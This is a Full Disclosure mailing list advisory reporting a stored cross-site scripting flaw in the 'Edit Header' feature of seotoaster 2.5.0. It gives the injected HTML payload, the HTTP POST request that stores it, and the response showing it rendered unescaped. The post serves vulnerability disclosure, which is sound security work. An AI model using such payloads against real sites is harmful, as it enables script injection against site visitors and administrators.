Full Disclosure mailing list archives
Stored XSS "Edit Header" Functionality - seotoasterv2.5.0
From: Andrey Stoykov <mwebsec () gmail com>
Date: Sat, 19 Jul 2025 21:03:54 +0100
# Exploit Title: Stored XSS "Edit Header" Functionality - seotoasterv2.5.0 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 2.5.0 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS "Edit Header" Functionality #1: Steps to Reproduce: Login as admin user and visit "News" Click on "Edit Header Content" and enter the payload "><img src=x onerror=alert(1)> // HTTP POST Request Editing Header POST /seotoaster/backend/backend_content/add/containerType/3/containerName/right_2/pageId/20 HTTP/1.1 Host: 192.168.58.149 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 [...] content="><img src=x onerror=alert(1)>&containerType=&containerName=&pageId=&containerId=&secureToken=f617b019f0d4dc84000659711cf16b0a // HTTP Response HTTP/1.1 200 OK Date: Sat, 19 Jul 2025 19:21:00 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 [...] {"error":0,"responseText":"148","httpCode":200} // HTTP GET Request GET /seotoaster/news/b2b-marketing-automation-a-booming-market-for-smart-web-agencies-1423145781.html HTTP/1.1 Host: 192.168.58.149 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 [...] // HTTP Response HTTP/1.1 200 OK Date: Sat, 19 Jul 2025 19:21:00 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/5.6.40 X-Frame-Options: SAMEORIGIN Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 36973 [...] <h3>"><img src=x onerror=alert(1)><a class="tpopup generator-links" data-pwidth="600" data-pheight="140" title="Click to edit header content" href="javascript:;" data-url=" http://192.168.58.149/seotoaster/backend/backend_content/edit/id/148/containerType/3";><img width="26" height="26" src=" http://192.168.58.149/seotoaster/system/images/editadd-header.png"; alt="edit header content" /></a></h3> [...] _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
![http://192.168.58.149/seotoaster/system/images/editadd-header.png"](http://192.168.58.149/seotoaster/system/images/editadd-header.png"){kind=link}
Current thread:
- Stored XSS "Edit Header" Functionality - seotoasterv2.5.0 Andrey Stoykov (Jul 29)